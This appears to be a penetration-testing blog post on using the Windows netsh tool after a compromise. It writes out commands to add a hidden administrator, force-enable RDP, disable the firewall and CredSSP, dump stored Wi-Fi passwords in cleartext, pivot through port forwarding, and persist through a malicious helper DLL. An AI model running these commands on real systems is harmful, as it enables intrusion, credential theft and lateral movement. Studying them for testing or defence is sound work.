Netshell in a Nutshell
A versatile built-in Windows network utility native to Windows 7 and above. If you’ve compromised a windows target and don’t have a fancy meterpreter shell, netsh will be a useful tool to enumerate, escalate or pivot. You can set firewall rules, open ports, check cached wifi credentials, configure port forwarding and much more.
Once you’ve gotten shell on a windows target you can start off by checking firewall info..
C:\>netsh netsh>firewall show state
Depending on privileges and how loud you want to be, you can configure RDP for any post-exploitation tasks.
Add new user, open remote desktop and add to group..
C:\>net user creosote pass123 /add C:\>net localgroup administrators creosote /add C:\>netsh firewall set service type = remotedesktop mode = enable C:\>net localgroup "Remote Desktop Users" creosote /ADD
If you’re having issues opening remote desktop with the above try this…
C:\>reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f C:\>reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f C:\>sc config TermService start= auto C:\>netsh firewall add portopening TCP 3389 "Remote Desktop" #If you get a CredSSP error try this… C:\>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
You can always disable the firewall if needed…
netsh>firewall set opmode mode=disable
If you’re conducting forensics or just enuming and want to check wireless info (hosted networks, wireless profiles, etc)…
netsh>wlan show all
It’s also possible to grab cached wireless creds…
netsh>wlan export profile key=clear
Add port forwarding and pivot to other machines on the network…
netsh> interface portproxy add v4tov4 listenport=LPORT listenaddress=0.0.0.0 connectport=RPORT connectaddress=RHOST
According to: https://attack.mitre.org/wiki/Technique/T1128 it’s also possible to maintain persistence through injecting a malicious DLL into the netsh helper DLL registry path. Netsh helper DLL’s extend the functionality of the netsh utility, and can be loaded when netsh is started.
Out of curiosity I dove into this a little more and created a working POC with write-up here: http://liberty-shell.com/sec/2018/07/28/netshlep/
Various installed applications (like VPN) may run netsh by default. The attacker may also set netsh to execute on startup, triggering the malicious DLL – creating a route for persistence.
A PoC can also be found here: https://github.com/outflanknl/NetshHelperBeacon